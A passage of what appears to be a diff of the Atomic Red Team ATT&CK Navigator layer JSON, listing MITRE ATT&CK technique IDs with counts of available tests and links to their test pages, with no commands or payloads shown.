Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View 